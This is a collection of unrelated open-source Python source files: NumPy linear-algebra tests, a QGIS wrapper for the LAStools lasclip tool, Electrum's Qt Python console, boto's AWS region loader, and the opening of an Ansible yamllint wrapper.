assert_raises(ValueError, np.linalg.eigh, x, "upper")
def test_UPLO(self):
Klo = np.array([[0, 0],[1, 0]], dtype=np.double)
Kup = np.array([[0, 1],[0, 0]], dtype=np.double)
tgt = np.array([-1, 1], dtype=np.double)
rtol = get_rtol(np.double)
# Check default is 'L'
w, v = np.linalg.eigh(Klo)
assert_allclose(w, tgt, rtol=rtol)
# Check 'L'
w, v = np.linalg.eigh(Klo, UPLO='L')
assert_allclose(w, tgt, rtol=rtol)
# Check 'l'
w, v = np.linalg.eigh(Klo, UPLO='l')
assert_allclose(w, tgt, rtol=rtol)
# Check 'U'
w, v = np.linalg.eigh(Kup, UPLO='U')
assert_allclose(w, tgt, rtol=rtol)
# Check 'u'
w, v = np.linalg.eigh(Kup, UPLO='u')
assert_allclose(w, tgt, rtol=rtol)
class _TestNorm(object):
dt = None
dec = None
def test_empty(self):
assert_equal(norm([]), 0.0)
assert_equal(norm(array([], dtype=self.dt)), 0.0)
assert_equal(norm(atleast_2d(array([], dtype=self.dt))), 0.0)
def test_vector(self):
a = [1, 2, 3, 4]
b = [-1, -2, -3, -4]
c = [-1, 2, -3, 4]
def _test(v):
np.testing.assert_almost_equal(norm(v), 30**0.5,
decimal=self.dec)
np.testing.assert_almost_equal(norm(v, inf), 4.0,
decimal=self.dec)
np.testing.assert_almost_equal(norm(v, -inf), 1.0,
decimal=self.dec)
np.testing.assert_almost_equal(norm(v, 1), 10.0,
decimal=self.dec)
np.testing.assert_almost_equal(norm(v, -1), 12.0/25,
decimal=self.dec)
np.testing.assert_almost_equal(norm(v, 2), 30**0.5,
decimal=self.dec)
np.testing.assert_almost_equal(norm(v, -2), ((205./144)**-0.5),
decimal=self.dec)
np.testing.assert_almost_equal(norm(v, 0), 4,
decimal=self.dec)
for v in (a, b, c,):
_test(v)
for v in (array(a, dtype=self.dt), array(b, dtype=self.dt),
array(c, dtype=self.dt)):
_test(v)
def test_matrix_2x2(self):
A = matrix([[1, 3], [5, 7]], dtype=self.dt)
assert_almost_equal(norm(A), 84**0.5)
assert_almost_equal(norm(A, 'fro'), 84**0.5)
assert_almost_equal(norm(A, 'nuc'), 10.0)
assert_almost_equal(norm(A, inf), 12.0)
assert_almost_equal(norm(A, -inf), 4.0)
assert_almost_equal(norm(A, 1), 10.0)
assert_almost_equal(norm(A, -1), 6.0)
assert_almost_equal(norm(A, 2), 9.1231056256176615)
assert_almost_equal(norm(A, -2), 0.87689437438234041)
assert_raises(ValueError, norm, A, 'nofro')
assert_raises(ValueError, norm, A, -3)
assert_raises(ValueError, norm, A, 0)
def test_matrix_3x3(self):
# This test has been added because the 2x2 example
# happened to have equal nuclear norm and induced 1-norm.
# The 1/10 scaling factor accommodates the absolute tolerance
# used in assert_almost_equal.
A = (1/10) * np.array([[1, 2, 3], [6, 0, 5], [3, 2, 1]], dtype=self.dt)
assert_almost_equal(norm(A), (1/10) * 89**0.5)
assert_almost_equal(norm(A, 'fro'), (1/10) * 89**0.5)
assert_almost_equal(norm(A, 'nuc'), 1.3366836911774836)
assert_almost_equal(norm(A, inf), 1.1)
assert_almost_equal(norm(A, -inf), 0.6)
assert_almost_equal(norm(A, 1), 1.0)
assert_almost_equal(norm(A, -1), 0.4)
assert_almost_equal(norm(A, 2), 0.88722940323461277)
assert_almost_equal(norm(A, -2), 0.19456584790481812)
def test_axis(self):
# Vector norms.
# Compare the use of `axis` with computing the norm of each row
# or column separately.
A = array([[1, 2, 3], [4, 5, 6]], dtype=self.dt)
for order in [None, -1, 0, 1, 2, 3, np.Inf, -np.Inf]:
expected0 = [norm(A[:, k], ord=order) for k in range(A.shape[1])]
assert_almost_equal(norm(A, ord=order, axis=0), expected0)
expected1 = [norm(A[k,:], ord=order) for k in range(A.shape[0])]
assert_almost_equal(norm(A, ord=order, axis=1), expected1)
# Matrix norms.
B = np.arange(1, 25, dtype=self.dt).reshape(2, 3, 4)
nd = B.ndim
for order in [None, -2, 2, -1, 1, np.Inf, -np.Inf, 'fro']:
for axis in itertools.combinations(range(-nd, nd), 2):
row_axis, col_axis = axis
if row_axis < 0:
row_axis += nd
if col_axis < 0:
col_axis += nd
if row_axis == col_axis:
assert_raises(ValueError, norm, B, ord=order, axis=axis)
else:
n = norm(B, ord=order, axis=axis)
# The logic using k_index only works for nd = 3.
# This has to be changed if nd is increased.
k_index = nd - (row_axis + col_axis)
if row_axis < col_axis:
expected = [norm(B[:].take(k, axis=k_index), ord=order)
for k in range(B.shape[k_index])]
else:
expected = [norm(B[:].take(k, axis=k_index).T, ord=order)
for k in range(B.shape[k_index])]
assert_almost_equal(n, expected)
def test_keepdims(self):
A = np.arange(1,25, dtype=self.dt).reshape(2,3,4)
allclose_err = 'order {0}, axis = {1}'
shape_err = 'Shape mismatch found {0}, expected {1}, order={2}, axis={3}'
# check the order=None, axis=None case
expected = norm(A, ord=None, axis=None)
found = norm(A, ord=None, axis=None, keepdims=True)
assert_allclose(np.squeeze(found), expected,
err_msg=allclose_err.format(None,None))
expected_shape = (1,1,1)
assert_(found.shape == expected_shape,
shape_err.format(found.shape, expected_shape, None, None))
# Vector norms.
for order in [None, -1, 0, 1, 2, 3, np.Inf, -np.Inf]:
for k in range(A.ndim):
expected = norm(A, ord=order, axis=k)
found = norm(A, ord=order, axis=k, keepdims=True)
assert_allclose(np.squeeze(found), expected,
err_msg=allclose_err.format(order,k))
expected_shape = list(A.shape)
expected_shape[k] = 1
expected_shape = tuple(expected_shape)
assert_(found.shape == expected_shape,
shape_err.format(found.shape, expected_shape, order, k))
# Matrix norms.
for order in [None, -2, 2, -1, 1, np.Inf, -np.Inf, 'fro', 'nuc']:
for k in itertools.permutations(range(A.ndim), 2):
expected = norm(A, ord=order, axis=k)
found = norm(A, ord=order, axis=k, keepdims=True)
assert_allclose(np.squeeze(found), expected,
err_msg=allclose_err.format(order,k))
expected_shape = list(A.shape)
expected_shape[k[0]] = 1
expected_shape[k[1]] = 1
expected_shape = tuple(expected_shape)
assert_(found.shape == expected_shape,
shape_err.format(found.shape, expected_shape, order, k))
def test_bad_args(self):
# Check that bad arguments raise the appropriate exceptions.
A = array([[1, 2, 3], [4, 5, 6]], dtype=self.dt)
B = np.arange(1, 25, dtype=self.dt).reshape(2, 3, 4)
# Using `axis=<integer>` or passing in a 1-D array implies vector
# norms are being computed, so also using `ord='fro'`
# or `ord='nuc'` raises a ValueError.
assert_raises(ValueError, norm, A, 'fro', 0)
assert_raises(ValueError, norm, A, 'nuc', 0)
assert_raises(ValueError, norm, [3, 4], 'fro', None)
assert_raises(ValueError, norm, [3, 4], 'nuc', None)
# Similarly, norm should raise an exception when ord is any finite
# number other than 1, 2, -1 or -2 when computing matrix norms.
for order in [0, 3]:
assert_raises(ValueError, norm, A, order, None)
assert_raises(ValueError, norm, A, order, (0, 1))
assert_raises(ValueError, norm, B, order, (1, 2))
# Invalid axis
assert_raises(ValueError, norm, B, None, 3)
assert_raises(ValueError, norm, B, None, (2, 3))
assert_raises(ValueError, norm, B, None, (0, 1, 2))
class TestNorm_NonSystematic(object):
def test_longdouble_norm(self):
# Non-regression test: p-norm of longdouble would previously raise
# UnboundLocalError.
x = np.arange(10, dtype=np.longdouble)
old_assert_almost_equal(norm(x, ord=3), 12.65, decimal=2)
def test_intmin(self):
# Non-regression test: p-norm of signed integer would previously do
# float cast and abs in the wrong order.
x = np.array([-2 ** 31], dtype=np.int32)
old_assert_almost_equal(norm(x, ord=3), 2 ** 31, decimal=5)
def test_complex_high_ord(self):
# gh-4156
d = np.empty((2,), dtype=np.clongdouble)
d[0] = 6+7j
d[1] = -6+7j
res = 11.615898132184
old_assert_almost_equal(np.linalg.norm(d, ord=3), res, decimal=10)
d = d.astype(np.complex128)
old_assert_almost_equal(np.linalg.norm(d, ord=3), res, decimal=9)
d = d.astype(np.complex64)
old_assert_almost_equal(np.linalg.norm(d, ord=3), res, decimal=5)
class TestNormDouble(_TestNorm):
dt = np.double
dec = 12
class TestNormSingle(_TestNorm):
dt = np.float32
dec = 6
class TestNormInt64(_TestNorm):
dt = np.int64
dec = 12
class TestMatrixRank(object):
def test_matrix_rank(self):
# Full rank matrix
yield assert_equal, 4, matrix_rank(np.eye(4))
# rank deficient matrix
I=np.eye(4); I[-1, -1] = 0.
yield assert_equal, matrix_rank(I), 3
# All zeros - zero rank
yield assert_equal, matrix_rank(np.zeros((4, 4))), 0
# 1 dimension - rank 1 unless all 0
yield assert_equal, matrix_rank([1, 0, 0, 0]), 1
yield assert_equal, matrix_rank(np.zeros((4,))), 0
# accepts array-like
yield assert_equal, matrix_rank([1]), 1
# greater than 2 dimensions raises error
yield assert_raises, TypeError, matrix_rank, np.zeros((2, 2, 2))
# works on scalar
yield assert_equal, matrix_rank(1), 1
def test_reduced_rank():
# Test matrices with reduced rank
rng = np.random.RandomState(20120714)
for i in range(100):
# Make a rank deficient matrix
X = rng.normal(size=(40, 10))
X[:, 0] = X[:, 1] + X[:, 2]
# Assert that matrix_rank detected deficiency
assert_equal(matrix_rank(X), 9)
X[:, 3] = X[:, 4] + X[:, 5]
assert_equal(matrix_rank(X), 8)
class TestQR(object):
def check_qr(self, a):
# This test expects the argument `a` to be an ndarray or
# a subclass of an ndarray of inexact type.
a_type = type(a)
a_dtype = a.dtype
m, n = a.shape
k = min(m, n)
# mode == 'complete'
q, r = linalg.qr(a, mode='complete')
assert_(q.dtype == a_dtype)
assert_(r.dtype == a_dtype)
assert_(isinstance(q, a_type))
assert_(isinstance(r, a_type))
assert_(q.shape == (m, m))
assert_(r.shape == (m, n))
assert_almost_equal(dot(q, r), a)
assert_almost_equal(dot(q.T.conj(), q), np.eye(m))
assert_almost_equal(np.triu(r), r)
# mode == 'reduced'
q1, r1 = linalg.qr(a, mode='reduced')
assert_(q1.dtype == a_dtype)
assert_(r1.dtype == a_dtype)
assert_(isinstance(q1, a_type))
assert_(isinstance(r1, a_type))
assert_(q1.shape == (m, k))
assert_(r1.shape == (k, n))
assert_almost_equal(dot(q1, r1), a)
assert_almost_equal(dot(q1.T.conj(), q1), np.eye(k))
assert_almost_equal(np.triu(r1), r1)
# mode == 'r'
r2 = linalg.qr(a, mode='r')
assert_(r2.dtype == a_dtype)
assert_(isinstance(r2, a_type))
assert_almost_equal(r2, r1)
def test_qr_empty(self):
a = np.zeros((0, 2))
assert_raises(linalg.LinAlgError, linalg.qr, a)
def test_mode_raw(self):
# The factorization is not unique and varies between libraries,
# so it is not possible to check against known values. Functional
# testing is a possibility, but awaits the exposure of more
# of the functions in lapack_lite. Consequently, this test is
# very limited in scope. Note that the results are in FORTRAN
# order, hence the h arrays are transposed.
a = array([[1, 2], [3, 4], [5, 6]], dtype=np.double)
b = a.astype(np.single)
# Test double
h, tau = linalg.qr(a, mode='raw')
assert_(h.dtype == np.double)
assert_(tau.dtype == np.double)
assert_(h.shape == (2, 3))
assert_(tau.shape == (2,))
h, tau = linalg.qr(a.T, mode='raw')
assert_(h.dtype == np.double)
assert_(tau.dtype == np.double)
assert_(h.shape == (3, 2))
assert_(tau.shape == (2,))
def test_mode_all_but_economic(self):
a = array([[1, 2], [3, 4]])
b = array([[1, 2], [3, 4], [5, 6]])
for dt in "fd":
m1 = a.astype(dt)
m2 = b.astype(dt)
self.check_qr(m1)
self.check_qr(m2)
self.check_qr(m2.T)
self.check_qr(matrix(m1))
for dt in "fd":
m1 = 1 + 1j * a.astype(dt)
m2 = 1 + 1j * b.astype(dt)
self.check_qr(m1)
self.check_qr(m2)
self.check_qr(m2.T)
self.check_qr(matrix(m1))
def test_byteorder_check():
# Byte order check should pass for native order
if sys.byteorder == 'little':
native = '<'
else:
native = '>'
for dtt in (np.float32, np.float64):
arr = np.eye(4, dtype=dtt)
n_arr = arr.newbyteorder(native)
sw_arr = arr.newbyteorder('S').byteswap()
assert_equal(arr.dtype.byteorder, '=')
for routine in (linalg.inv, linalg.det, linalg.pinv):
# Normal call
res = routine(arr)
# Native but not '='
assert_array_equal(res, routine(n_arr))
# Swapped
assert_array_equal(res, routine(sw_arr))
def test_generalized_raise_multiloop():
# It should raise an error even if the error doesn't occur in the
# last iteration of the ufunc inner loop
invertible = np.array([[1, 2], [3, 4]])
non_invertible = np.array([[1, 1], [1, 1]])
x = np.zeros([4, 4, 2, 2])[1::2]
x[...] = invertible
x[0, 0] = non_invertible
assert_raises(np.linalg.LinAlgError, np.linalg.inv, x)
def test_xerbla_override():
# Check that our xerbla has been successfully linked in. If it is not,
# the default xerbla routine is called, which prints a message to stdout
# and may, or may not, abort the process depending on the LAPACK package.
from nose import SkipTest
XERBLA_OK = 255
try:
pid = os.fork()
except (OSError, AttributeError):
# fork failed, or not running on POSIX
raise SkipTest("Not POSIX or fork failed.")
if pid == 0:
# child; close i/o file handles
os.close(1)
os.close(0)
# Avoid producing core files.
import resource
resource.setrlimit(resource.RLIMIT_CORE, (0, 0))
# These calls may abort.
try:
np.linalg.lapack_lite.xerbla()
except ValueError:
pass
except:
os._exit(os.EX_CONFIG)
try:
a = np.array([[1.]])
np.linalg.lapack_lite.dorgqr(
1, 1, 1, a,
0, # <- invalid value
a, a, 0, 0)
except ValueError as e:
if "DORGQR parameter number 5" in str(e):
# success, reuse error code to mark success as
# FORTRAN STOP returns as success.
os._exit(XERBLA_OK)
# Did not abort, but our xerbla was not linked in.
os._exit(os.EX_CONFIG)
else:
# parent
pid, status = os.wait()
if os.WEXITSTATUS(status) != XERBLA_OK:
raise SkipTest('Numpy xerbla not linked in.')
class TestMultiDot(object):
def test_basic_function_with_three_arguments(self):
# multi_dot with three arguments uses a fast hand coded algorithm to
# determine the optimal order. Therefore test it separately.
A = np.random.random((6, 2))
B = np.random.random((2, 6))
C = np.random.random((6, 2))
assert_almost_equal(multi_dot([A, B, C]), A.dot(B).dot(C))
assert_almost_equal(multi_dot([A, B, C]), np.dot(A, np.dot(B, C)))
def test_basic_function_with_dynamic_programing_optimization(self):
# multi_dot with four or more arguments uses the dynamic programing
# optimization and therefore deserve a separate
A = np.random.random((6, 2))
B = np.random.random((2, 6))
C = np.random.random((6, 2))
D = np.random.random((2, 1))
assert_almost_equal(multi_dot([A, B, C, D]), A.dot(B).dot(C).dot(D))
def test_vector_as_first_argument(self):
# The first argument can be 1-D
A1d = np.random.random(2) # 1-D
B = np.random.random((2, 6))
C = np.random.random((6, 2))
D = np.random.random((2, 2))
# the result should be 1-D
assert_equal(multi_dot([A1d, B, C, D]).shape, (2,))
def test_vector_as_last_argument(self):
# The last argument can be 1-D
A = np.random.random((6, 2))
B = np.random.random((2, 6))
C = np.random.random((6, 2))
D1d = np.random.random(2) # 1-D
# the result should be 1-D
assert_equal(multi_dot([A, B, C, D1d]).shape, (6,))
def test_vector_as_first_and_last_argument(self):
# The first and last arguments can be 1-D
A1d = np.random.random(2) # 1-D
B = np.random.random((2, 6))
C = np.random.random((6, 2))
D1d = np.random.random(2) # 1-D
# the result should be a scalar
assert_equal(multi_dot([A1d, B, C, D1d]).shape, ())
def test_dynamic_programming_logic(self):
# Test for the dynamic programming part
# This test is directly taken from Cormen page 376.
arrays = [np.random.random((30, 35)),
np.random.random((35, 15)),
np.random.random((15, 5)),
np.random.random((5, 10)),
np.random.random((10, 20)),
np.random.random((20, 25))]
m_expected = np.array([[0., 15750., 7875., 9375., 11875., 15125.],
[0., 0., 2625., 4375., 7125., 10500.],
[0., 0., 0., 750., 2500., 5375.],
[0., 0., 0., 0., 1000., 3500.],
[0., 0., 0., 0., 0., 5000.],
[0., 0., 0., 0., 0., 0.]])
s_expected = np.array([[0, 1, 1, 3, 3, 3],
[0, 0, 2, 3, 3, 3],
[0, 0, 0, 3, 3, 3],
[0, 0, 0, 0, 4, 5],
[0, 0, 0, 0, 0, 5],
[0, 0, 0, 0, 0, 0]], dtype=np.int)
s_expected -= 1 # Cormen uses 1-based index, python does not.
s, m = _multi_dot_matrix_chain_order(arrays, return_costs=True)
# Only the upper triangular part (without the diagonal) is interesting.
assert_almost_equal(np.triu(s[:-1, 1:]),
np.triu(s_expected[:-1, 1:]))
assert_almost_equal(np.triu(m), np.triu(m_expected))
def test_too_few_input_arrays(self):
assert_raises(ValueError, multi_dot, [])
assert_raises(ValueError, multi_dot, [np.random.random((3, 3))])
if __name__ == "__main__":
run_module_suite()
|
"""
***************************************************************************
lasclip.py
---------------------
Date : August 2012
Copyright : (C) 2012 by Victor Olaya
Email : volayaf at gmail dot com
---------------------
Date : September 2013
Copyright : (C) 2013 by Martin Isenburg
Email : martin near rapidlasso point com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Victor Olaya'
__date__ = 'August 2012'
__copyright__ = '(C) 2012, Victor Olaya'
__revision__ = '$Format:%H$'
import os
from LAStoolsUtils import LAStoolsUtils
from LAStoolsAlgorithm import LAStoolsAlgorithm
from processing.core.parameters import ParameterVector
from processing.core.parameters import ParameterBoolean
from processing.core.parameters import ParameterNumber
from processing.core.parameters import ParameterSelection
class lasclip(LAStoolsAlgorithm):
POLYGON = "POLYGON"
INTERIOR = "INTERIOR"
OPERATION = "OPERATION"
OPERATIONS = ["clip", "classify"]
CLASSIFY_AS = "CLASSIFY_AS"
def defineCharacteristics(self):
self.name = "lasclip"
self.group = "LAStools"
self.addParametersVerboseGUI()
self.addParametersPointInputGUI()
self.addParameter(ParameterVector(lasclip.POLYGON,
self.tr("Input polygon(s)"), ParameterVector.VECTOR_TYPE_POLYGON))
self.addParameter(ParameterBoolean(lasclip.INTERIOR,
self.tr("interior"), False))
self.addParameter(ParameterSelection(lasclip.OPERATION,
self.tr("what to do with points"), lasclip.OPERATIONS, 0))
self.addParameter(ParameterNumber(lasclip.CLASSIFY_AS,
self.tr("classify as"), 0, None, 12))
self.addParametersPointOutputGUI()
self.addParametersAdditionalGUI()
def processAlgorithm(self, progress):
commands = [os.path.join(LAStoolsUtils.LAStoolsPath(), "bin", "lasclip")]
self.addParametersVerboseCommands(commands)
self.addParametersPointInputCommands(commands)
poly = self.getParameterValue(lasclip.POLYGON)
if poly is not None:
commands.append("-poly")
commands.append(poly)
if self.getParameterValue(lasclip.INTERIOR):
commands.append("-interior")
operation = self.getParameterValue(lasclip.OPERATION)
if operation != 0:
commands.append("-classify")
classify_as = self.getParameterValue(lasclip.CLASSIFY_AS)
commands.append(str(classify_as))
self.addParametersPointOutputCommands(commands)
self.addParametersAdditionalCommands(commands)
LAStoolsUtils.runLAStools(commands, progress)
|
import sys, os, re
import traceback, platform
from PyQt4 import QtCore
from PyQt4 import QtGui
from electrum import util
if platform.system() == 'Windows':
MONOSPACE_FONT = 'Lucida Console'
elif platform.system() == 'Darwin':
MONOSPACE_FONT = 'Monaco'
else:
MONOSPACE_FONT = 'monospace'
class Console(QtGui.QPlainTextEdit):
def __init__(self, prompt='>> ', startup_message='', parent=None):
QtGui.QPlainTextEdit.__init__(self, parent)
self.prompt = prompt
self.history = []
self.namespace = {}
self.construct = []
self.setGeometry(50, 75, 600, 400)
self.setWordWrapMode(QtGui.QTextOption.WrapAnywhere)
self.setUndoRedoEnabled(False)
self.document().setDefaultFont(QtGui.QFont(MONOSPACE_FONT, 10, QtGui.QFont.Normal))
self.showMessage(startup_message)
self.updateNamespace({'run':self.run_script})
self.set_json(False)
def set_json(self, b):
self.is_json = b
def run_script(self, filename):
with open(filename) as f:
script = f.read()
# eval is generally considered bad practice. use it wisely!
result = eval(script, self.namespace, self.namespace)
def updateNamespace(self, namespace):
self.namespace.update(namespace)
def showMessage(self, message):
self.appendPlainText(message)
self.newPrompt()
def clear(self):
self.setPlainText('')
self.newPrompt()
def newPrompt(self):
if self.construct:
prompt = '.' * len(self.prompt)
else:
prompt = self.prompt
self.completions_pos = self.textCursor().position()
self.completions_visible = False
self.appendPlainText(prompt)
self.moveCursor(QtGui.QTextCursor.End)
def getCommand(self):
doc = self.document()
curr_line = unicode(doc.findBlockByLineNumber(doc.lineCount() - 1).text())
curr_line = curr_line.rstrip()
curr_line = curr_line[len(self.prompt):]
return curr_line
def setCommand(self, command):
if self.getCommand() == command:
return
doc = self.document()
curr_line = unicode(doc.findBlockByLineNumber(doc.lineCount() - 1).text())
self.moveCursor(QtGui.QTextCursor.End)
for i in range(len(curr_line) - len(self.prompt)):
self.moveCursor(QtGui.QTextCursor.Left, QtGui.QTextCursor.KeepAnchor)
self.textCursor().removeSelectedText()
self.textCursor().insertText(command)
self.moveCursor(QtGui.QTextCursor.End)
def show_completions(self, completions):
if self.completions_visible:
self.hide_completions()
c = self.textCursor()
c.setPosition(self.completions_pos)
completions = map(lambda x: x.split('.')[-1], completions)
t = '\n' + ' '.join(completions)
if len(t) > 500:
t = t[:500] + '...'
c.insertText(t)
self.completions_end = c.position()
self.moveCursor(QtGui.QTextCursor.End)
self.completions_visible = True
def hide_completions(self):
if not self.completions_visible:
return
c = self.textCursor()
c.setPosition(self.completions_pos)
l = self.completions_end - self.completions_pos
for x in range(l): c.deleteChar()
self.moveCursor(QtGui.QTextCursor.End)
self.completions_visible = False
def getConstruct(self, command):
if self.construct:
prev_command = self.construct[-1]
self.construct.append(command)
if not prev_command and not command:
ret_val = '\n'.join(self.construct)
self.construct = []
return ret_val
else:
return ''
else:
if command and command[-1] == (':'):
self.construct.append(command)
return ''
else:
return command
def getHistory(self):
return self.history
def setHisory(self, history):
self.history = history
def addToHistory(self, command):
if command[0:1] == ' ':
return
if command and (not self.history or self.history[-1] != command):
self.history.append(command)
self.history_index = len(self.history)
def getPrevHistoryEntry(self):
if self.history:
self.history_index = max(0, self.history_index - 1)
return self.history[self.history_index]
return ''
def getNextHistoryEntry(self):
if self.history:
hist_len = len(self.history)
self.history_index = min(hist_len, self.history_index + 1)
if self.history_index < hist_len:
return self.history[self.history_index]
return ''
def getCursorPosition(self):
c = self.textCursor()
return c.position() - c.block().position() - len(self.prompt)
def setCursorPosition(self, position):
self.moveCursor(QtGui.QTextCursor.StartOfLine)
for i in range(len(self.prompt) + position):
self.moveCursor(QtGui.QTextCursor.Right)
def register_command(self, c, func):
methods = { c: func}
self.updateNamespace(methods)
def runCommand(self):
command = self.getCommand()
self.addToHistory(command)
command = self.getConstruct(command)
if command:
tmp_stdout = sys.stdout
class stdoutProxy():
def __init__(self, write_func):
self.write_func = write_func
self.skip = False
def flush(self):
pass
def write(self, text):
if not self.skip:
stripped_text = text.rstrip('\n')
self.write_func(stripped_text)
QtCore.QCoreApplication.processEvents()
self.skip = not self.skip
if type(self.namespace.get(command)) == type(lambda:None):
self.appendPlainText("'%s' is a function. Type '%s()' to use it in the Python console."%(command, command))
self.newPrompt()
return
sys.stdout = stdoutProxy(self.appendPlainText)
try:
try:
# eval is generally considered bad practice. use it wisely!
result = eval(command, self.namespace, self.namespace)
if result != None:
if self.is_json:
util.print_json(result)
else:
self.appendPlainText(repr(result))
except SyntaxError:
# exec is generally considered bad practice. use it wisely!
exec command in self.namespace
except SystemExit:
self.close()
except Exception:
traceback_lines = traceback.format_exc().split('\n')
# Remove traceback mentioning this file, and a linebreak
for i in (3,2,1,-1):
traceback_lines.pop(i)
self.appendPlainText('\n'.join(traceback_lines))
sys.stdout = tmp_stdout
self.newPrompt()
self.set_json(False)
def keyPressEvent(self, event):
if event.key() == QtCore.Qt.Key_Tab:
self.completions()
return
self.hide_completions()
if event.key() in (QtCore.Qt.Key_Enter, QtCore.Qt.Key_Return):
self.runCommand()
return
if event.key() == QtCore.Qt.Key_Home:
self.setCursorPosition(0)
return
if event.key() == QtCore.Qt.Key_PageUp:
return
elif event.key() in (QtCore.Qt.Key_Left, QtCore.Qt.Key_Backspace):
if self.getCursorPosition() == 0:
return
elif event.key() == QtCore.Qt.Key_Up:
self.setCommand(self.getPrevHistoryEntry())
return
elif event.key() == QtCore.Qt.Key_Down:
self.setCommand(self.getNextHistoryEntry())
return
elif event.key() == QtCore.Qt.Key_L and event.modifiers() == QtCore.Qt.ControlModifier:
self.clear()
super(Console, self).keyPressEvent(event)
def completions(self):
cmd = self.getCommand()
lastword = re.split(' |\(|\)',cmd)[-1]
beginning = cmd[0:-len(lastword)]
path = lastword.split('.')
ns = self.namespace.keys()
if len(path) == 1:
ns = ns
prefix = ''
else:
obj = self.namespace.get(path[0])
prefix = path[0] + '.'
ns = dir(obj)
completions = []
for x in ns:
if x[0] == '_':continue
xx = prefix + x
if xx.startswith(lastword):
completions.append(xx)
completions.sort()
if not completions:
self.hide_completions()
elif len(completions) == 1:
self.hide_completions()
self.setCommand(beginning + completions[0])
else:
# find common prefix
p = os.path.commonprefix(completions)
if len(p)>len(lastword):
self.hide_completions()
self.setCommand(beginning + p)
else:
self.show_completions(completions)
welcome_message = '''
---------------------------------------------------------------
Welcome to a primitive Python interpreter.
---------------------------------------------------------------
'''
if __name__ == '__main__':
app = QtGui.QApplication(sys.argv)
console = Console(startup_message=welcome_message)
console.updateNamespace({'myVar1' : app, 'myVar2' : 1234})
console.show();
sys.exit(app.exec_())
|
from __future__ import with_statement
import os
import boto
from boto.compat import json
from boto.exception import BotoClientError
def load_endpoint_json(path):
"""
Loads a given JSON file & returns it.
:param path: The path to the JSON file
:type path: string
:returns: The loaded data
"""
with open(path, 'r') as endpoints_file:
return json.load(endpoints_file)
def merge_endpoints(defaults, additions):
"""
Given an existing set of endpoint data, this will deep-update it with
any similarly structured data in the additions.
:param defaults: The existing endpoints data
:type defaults: dict
:param defaults: The additional endpoints data
:type defaults: dict
:returns: The modified endpoints data
:rtype: dict
"""
# We can't just do an ``defaults.update(...)`` here, as that could
# *overwrite* regions if present in both.
# We'll iterate instead, essentially doing a deeper merge.
for service, region_info in additions.items():
# Set the default, if not present, to an empty dict.
defaults.setdefault(service, {})
defaults[service].update(region_info)
return defaults
def load_regions():
"""
Actually load the region/endpoint information from the JSON files.
By default, this loads from the default included ``boto/endpoints.json``
file.
Users can override/extend this by supplying either a ``BOTO_ENDPOINTS``
environment variable or a ``endpoints_path`` config variable, either of
which should be an absolute path to the user's JSON file.
:returns: The endpoints data
:rtype: dict
"""
# Load the defaults first.
endpoints = load_endpoint_json(boto.ENDPOINTS_PATH)
additional_path = None
# Try the ENV var. If not, check the config file.
if os.environ.get('BOTO_ENDPOINTS'):
additional_path = os.environ['BOTO_ENDPOINTS']
elif boto.config.get('boto', 'endpoints_path'):
additional_path = boto.config.get('boto', 'endpoints_path')
# If there's a file provided, we'll load it & additively merge it into
# the endpoints.
if additional_path:
additional = load_endpoint_json(additional_path)
endpoints = merge_endpoints(endpoints, additional)
return endpoints
def get_regions(service_name, region_cls=None, connection_cls=None):
"""
Given a service name (like ``ec2``), returns a list of ``RegionInfo``
objects for that service.
This leverages the ``endpoints.json`` file (+ optional user overrides) to
configure/construct all the objects.
:param service_name: The name of the service to construct the ``RegionInfo``
objects for. Ex: ``ec2``, ``s3``, ``sns``, etc.
:type service_name: string
:param region_cls: (Optional) The class to use when constructing. By
default, this is ``RegionInfo``.
:type region_cls: class
:param connection_cls: (Optional) The connection class for the
``RegionInfo`` object. Providing this allows the ``connect`` method on
the ``RegionInfo`` to work. Default is ``None`` (no connection).
:type connection_cls: class
:returns: A list of configured ``RegionInfo`` objects
:rtype: list
"""
endpoints = load_regions()
if not service_name in endpoints:
raise BotoClientError(
"Service '%s' not found in endpoints." % service_name
)
if region_cls is None:
region_cls = RegionInfo
region_objs = []
for region_name, endpoint in endpoints.get(service_name, {}).items():
region_objs.append(
region_cls(
name=region_name,
endpoint=endpoint,
connection_cls=connection_cls
)
)
return region_objs
class RegionInfo(object):
"""
Represents an AWS Region
"""
def __init__(self, connection=None, name=None, endpoint=None,
connection_cls=None):
self.connection = connection
self.name = name
self.endpoint = endpoint
self.connection_cls = connection_cls
def __repr__(self):
return 'RegionInfo:%s' % self.name
def startElement(self, name, attrs, connection):
return None
def endElement(self, name, value, connection):
if name == 'regionName':
self.name = value
elif name == 'regionEndpoint':
self.endpoint = value
else:
setattr(self, name, value)
def connect(self, **kw_params):
"""
Connect to this Region's endpoint. Returns an connection
object pointing to the endpoint associated with this region.
You may pass any of the arguments accepted by the connection
class's constructor as keyword arguments and they will be
passed along to the connection object.
:rtype: Connection object
:return: The connection to this regions endpoint
"""
if self.connection_cls:
return self.connection_cls(region=self, **kw_params)
|
"""Wrapper around yamllint that supports YAML embedded in Ansible modules."""
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import ast
import json
import os
import re
import sys
import typing as t
import yaml
from yaml.resolver import Resolver
from yaml.constructor import SafeConstructor
from yaml.error import MarkedYAMLError
from _yaml import CParser # pylint: disable=no-name-in-module
from yamllint import linter
from yamllint.config import YamlLintConfig
def main():
"""Main program body."""
paths = sys.argv[1:] or sys.stdin.read().splitlines()
checker = YamlChecker()
checker.check(paths)
checker.report()
class TestConstructor(SafeConstructor):
"""Yaml Safe Constructor that knows about Ansible tags."""
def construct_yaml_unsafe(self, node):
"""Construct an unsafe tag."""
try:
constructor = getattr(node, 'id', 'object')
if constructor is not None:
constructor = getattr(self, 'construct_%s' % constructor)
except AttributeError:
constructor = self.construct_object
value = constructor(node)
return value
TestConstructor.add_constructor(
u'!unsafe',
TestConstructor.construct_yaml_unsafe)
TestConstructor.add_constructor(
u'!vault',
TestConstructor.construct_yaml_str)
TestConstructor.add_constructor(
u'!vault-encrypted',
TestConstructor.construct_yaml_str)
class TestLoader(CParser, TestConstructor, Resolver):
"""Custom YAML loader that recognizes custom Ansible tags."""
def __init__(self, stream):
CParser.__init__(self, stream)
TestConstructor.__init__(self)
Resolver.__init__(self)
class YamlChecker:
"""Wrapper around yamllint that supports YAML embedded in Ansible modules."""
def __init__(self):
self.messages = []
def report(self):
"""Print yamllint report to stdout."""
report = dict(
messages=self.messages,
)
